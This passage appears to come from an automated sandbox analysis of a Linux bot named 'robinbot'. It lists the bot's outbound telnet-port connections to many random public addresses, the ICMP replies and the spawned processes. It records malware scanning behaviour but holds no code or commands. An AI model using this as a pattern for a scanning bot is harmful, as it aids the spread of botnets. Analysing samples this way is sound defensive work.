                  Nov 29, 2022 16:27:45.267196894 CET1566123192.168.2.2036.250.43.134
                  Nov 29, 2022 16:27:45.267199039 CET1566123192.168.2.2012.53.44.177
                  Nov 29, 2022 16:27:45.267199993 CET1566123192.168.2.2042.209.60.171
                  Nov 29, 2022 16:27:45.267199993 CET1566123192.168.2.2059.166.174.33
                  Nov 29, 2022 16:27:45.267203093 CET1566123192.168.2.20103.183.140.115
                  Nov 29, 2022 16:27:45.267208099 CET1566123192.168.2.2083.131.63.191
                  Nov 29, 2022 16:27:45.267209053 CET1566123192.168.2.20154.228.227.62
                  Nov 29, 2022 16:27:45.267219067 CET1566123192.168.2.2081.22.165.36
                  Nov 29, 2022 16:27:45.267225027 CET1566123192.168.2.20223.142.69.204
                  Nov 29, 2022 16:27:45.267810106 CET1566123192.168.2.20156.104.154.166
                  Nov 29, 2022 16:27:45.267813921 CET1566123192.168.2.20151.100.194.4
                  Nov 29, 2022 16:27:45.267818928 CET156612323192.168.2.20200.92.245.153
                  Nov 29, 2022 16:27:45.267854929 CET1566123192.168.2.20176.16.45.44
                  Nov 29, 2022 16:27:45.267862082 CET1566123192.168.2.20190.60.137.214
                  Nov 29, 2022 16:27:45.267860889 CET1566123192.168.2.2082.222.227.185
                  Nov 29, 2022 16:27:45.267877102 CET1566123192.168.2.20160.77.218.188
                  Nov 29, 2022 16:27:45.268867970 CET1566123192.168.2.2053.245.99.125
                  Nov 29, 2022 16:27:45.268882036 CET1566123192.168.2.20209.216.24.196
                  Nov 29, 2022 16:27:45.268906116 CET1566123192.168.2.20119.29.213.41
                  Nov 29, 2022 16:27:45.268913031 CET1566123192.168.2.20117.85.209.244
                  Nov 29, 2022 16:27:45.268929005 CET1566123192.168.2.2045.130.85.127
                  Nov 29, 2022 16:27:45.268951893 CET1566123192.168.2.20199.52.67.26
                  Nov 29, 2022 16:27:45.268956900 CET156612323192.168.2.20116.67.119.148
                  Nov 29, 2022 16:27:45.268955946 CET1566123192.168.2.2016.209.81.69
                  Nov 29, 2022 16:27:45.269290924 CET1566123192.168.2.2014.91.222.3
                  Nov 29, 2022 16:27:45.269712925 CET1566123192.168.2.2048.49.247.168
                  Nov 29, 2022 16:27:45.269731998 CET1566123192.168.2.2078.78.81.123
                  Nov 29, 2022 16:27:45.269761086 CET1566123192.168.2.20208.38.123.178
                  Nov 29, 2022 16:27:45.269761086 CET1566123192.168.2.20223.53.210.84
                  Nov 29, 2022 16:27:45.269794941 CET156612323192.168.2.20141.120.197.91
                  Nov 29, 2022 16:27:45.269794941 CET1566123192.168.2.2070.23.87.24
                  Nov 29, 2022 16:27:45.269805908 CET1566123192.168.2.2061.210.74.156
                  Nov 29, 2022 16:27:45.269826889 CET1566123192.168.2.20155.186.78.227
                  Nov 29, 2022 16:27:45.269826889 CET1566123192.168.2.20108.92.128.157
                  Nov 29, 2022 16:27:45.270670891 CET1566123192.168.2.20135.29.113.127
                  Nov 29, 2022 16:27:45.270684004 CET1566123192.168.2.20149.87.229.133
                  Nov 29, 2022 16:27:45.270709038 CET1566123192.168.2.2065.131.242.78
                  Nov 29, 2022 16:27:45.270713091 CET1566123192.168.2.20104.227.3.213
                  Nov 29, 2022 16:27:45.270721912 CET1566123192.168.2.20124.56.170.194
                  Nov 29, 2022 16:27:45.270739079 CET1566123192.168.2.2079.2.90.12
                  Nov 29, 2022 16:27:45.270749092 CET1566123192.168.2.2084.164.169.219
                  TimestampSource IPDest IPChecksumCodeType
                  Nov 29, 2022 16:27:45.295325041 CET2.243.179.168192.168.2.20913(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:45.298552036 CET145.220.78.2192.168.2.20ad48(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:45.300121069 CET84.164.169.219192.168.2.20c12e(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:45.388153076 CET104.227.3.213192.168.2.202c8c(Port unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:45.496129990 CET187.127.3.105192.168.2.207ed0(Port unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:46.302711964 CET109.250.53.73192.168.2.201c6b(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:46.315733910 CET2.100.218.74192.168.2.209c78(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:46.318825006 CET100.64.0.1192.168.2.205e56(Time to live exceeded in transit)Time Exceeded
                  Nov 29, 2022 16:27:47.322309017 CET84.138.185.220192.168.2.20b147(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:47.448013067 CET184.188.10.149192.168.2.20355c(Time to live exceeded in transit)Time Exceeded
                  Nov 29, 2022 16:27:47.545892000 CET200.186.38.254192.168.2.20ff05(Time to live exceeded in transit)Time Exceeded
                  Nov 29, 2022 16:27:47.669383049 CET100.70.39.242192.168.2.2096a1(Time to live exceeded in transit)Time Exceeded
                  Nov 29, 2022 16:27:48.301740885 CET159.253.60.186192.168.2.2096cc(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:49.112189054 CET216.66.27.22192.168.2.20be68(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:49.203479052 CET157.90.102.104192.168.2.20c38f(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:49.229221106 CET212.58.186.154192.168.2.206ecf(Net unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:49.475986958 CET121.111.229.53192.168.2.20f75d(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:50.393419981 CET78.64.114.242192.168.2.206530(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:50.510566950 CET184.64.190.189192.168.2.2036d2(Port unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:50.636332035 CET218.248.109.157192.168.2.207cf1(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:51.297362089 CET197.13.3.22192.168.2.20d068(Net unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:51.323653936 CET185.108.141.43192.168.2.203465(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:51.374502897 CET195.229.0.113192.168.2.20dc71(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:51.423990011 CET184.66.19.102192.168.2.208b7c(Port unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:52.146224976 CET5.231.144.126192.168.2.202949(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:52.156313896 CET78.145.38.77192.168.2.2034a8(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:52.250840902 CET161.247.129.30192.168.2.204c26(Net unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:52.324526072 CET58.220.224.154192.168.2.20db4a(Port unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:52.397566080 CET69.139.78.181192.168.2.20b20(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:53.323477983 CET178.2.91.212192.168.2.20b1d7(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:53.474448919 CET209.193.123.242192.168.2.207215(Time to live exceeded in transit)Time Exceeded
                  Nov 29, 2022 16:27:53.943783998 CET112.188.172.150192.168.2.20e485(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:54.279351950 CET212.85.149.2192.168.2.20d5b3(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:54.386575937 CET197.215.157.42192.168.2.20da5b(Time to live exceeded in transit)Time Exceeded
                  Nov 29, 2022 16:27:54.427923918 CET108.188.174.0192.168.2.20b9c0(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:55.238718033 CET62.145.75.4192.168.2.20f1b0(Net unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:55.283649921 CET10.225.7.93192.168.2.203a6a(Time to live exceeded in transit)Time Exceeded
                  Nov 29, 2022 16:27:55.476638079 CET202.128.2.149192.168.2.20d6f2(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:55.770101070 CET116.212.180.80192.168.2.20e8fa(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:56.225367069 CET62.91.100.102192.168.2.201ced(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:57.213294029 CET88.146.180.2192.168.2.20c7b2(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:57.250565052 CET84.79.234.113192.168.2.2080f7(Port unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:57.547262907 CET95.117.33.24192.168.2.203f21(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:57.806675911 CET59.150.104.134192.168.2.20ea26(Time to live exceeded in transit)Time Exceeded
                  Nov 29, 2022 16:27:57.841708899 CET140.119.243.5192.168.2.20603d(Time to live exceeded in transit)Time Exceeded
                  Nov 29, 2022 16:27:59.115823984 CET84.131.52.222192.168.2.20364d(Unknown)Destination Unreachable
                  Nov 29, 2022 16:27:59.121828079 CET185.18.150.110192.168.2.20fd2e(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:27:59.229054928 CET168.244.174.85192.168.2.204997(Time to live exceeded in transit)Time Exceeded
                  Nov 29, 2022 16:28:00.655702114 CET68.234.193.158192.168.2.208ffe(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:28:14.013925076 CET125.103.207.168192.168.2.20384c(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:29:05.264163971 CET73.67.181.193192.168.2.20e83c(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:29:05.271523952 CET73.67.181.193192.168.2.20e83c(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:29:05.271559000 CET73.67.181.193192.168.2.20e83c(Host unreachable)Destination Unreachable
                  Nov 29, 2022 16:29:05.271574974 CET73.67.181.193192.168.2.20e83c(Host unreachable)Destination Unreachable

                  System Behavior

                  Start time:16:27:44
                  Start date:29/11/2022
                  Path:/tmp/robinbot
                  Arguments:/tmp/robinbot
                  File size:0 bytes
                  MD5 hash:unknown
                  Start time:16:27:44
                  Start date:29/11/2022
                  Path:/tmp/robinbot
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:unknown
                  Start time:16:27:44
                  Start date:29/11/2022
                  Path:/tmp/robinbot
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:unknown
                  Start time:16:27:44
                  Start date:29/11/2022
                  Path:/tmp/robinbot
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:unknown
                  Start time:16:27:44
                  Start date:29/11/2022
                  Path:/tmp/robinbot
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:unknown
                  Start time:16:27:44
                  Start date:29/11/2022
                  Path:/tmp/robinbot
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:unknown
                  Start time:16:27:51
                  Start date:29/11/2022
                  Path:/sbin/upstart
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:unknown
                  Start time:16:27:51
                  Start date:29/11/2022
                  Path:/bin/sh
                  Arguments:/bin/sh -e /proc/self/fd/9
                  File size:4 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                  Start time:16:27:51
                  Start date:29/11/2022
                  Path:/bin/sh
                  Arguments:n/a
                  File size:4 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                  Start time:16:27:51
                  Start date:29/11/2022
                  Path:/bin/date
                  Arguments:date
                  File size:68464 bytes
                  MD5 hash:54903b613f9019bfca9f5d28a4fff34e
                  Start time:16:27:51
                  Start date:29/11/2022
                  Path:/bin/sh
                  Arguments:n/a
                  File size:4 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                  Start time:16:27:51
                  Start date:29/11/2022
                  Path:/usr/share/apport/apport-checkreports
                  Arguments:/usr/bin/python3 /usr/share/apport/apport-checkreports --system
                  File size:1269 bytes
                  MD5 hash:1a7d84ebc34df04e55ca3723541f48c9
                  Start time:16:27:51
                  Start date:29/11/2022
                  Path:/sbin/upstart
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:unknown
                  Start time:16:27:51
                  Start date:29/11/2022
                  Path:/bin/sh
                  Arguments:/bin/sh -e /proc/self/fd/9
                  File size:4 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                  Start time:16:27:51
                  Start date:29/11/2022
                  Path:/bin/sh
                  Arguments:n/a
                  File size:4 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                  Start time:16:27:51
                  Start date:29/11/2022
                  Path:/bin/date
                  Arguments:date
                  File size:68464 bytes
                  MD5 hash:54903b613f9019bfca9f5d28a4fff34e
                  Start time:16:27:51
                  Start date:29/11/2022
                  Path:/bin/sh
                  Arguments:n/a
                  File size:4 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                  Start time:16:27:51
                  Start date:29/11/2022
                  Path:/usr/share/apport/apport-gtk
                  Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                  File size:23806 bytes
                  MD5 hash:ec58a49a30ef6a29406a204f28cc7d87
                  Start time:16:27:52
                  Start date:29/11/2022
                  Path:/sbin/upstart
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:unknown
                  Start time:16:27:52
                  Start date:29/11/2022
                  Path:/bin/sh
                  Arguments:/bin/sh -e /proc/self/fd/9
                  File size:4 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                  Start time:16:27:52
                  Start date:29/11/2022
                  Path:/bin/sh
                  Arguments:n/a
                  File size:4 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                  Start time:16:27:52
                  Start date:29/11/2022
                  Path:/bin/date
                  Arguments:date
                  File size:68464 bytes
                  MD5 hash:54903b613f9019bfca9f5d28a4fff34e
                  Start time:16:27:52
                  Start date:29/11/2022
                  Path:/bin/sh
                  Arguments:n/a
                  File size:4 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                  Start time:16:27:52
                  Start date:29/11/2022
                  Path:/usr/share/apport/apport-gtk
                  Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                  File size:23806 bytes
                  MD5 hash:ec58a49a30ef6a29406a204f28cc7d87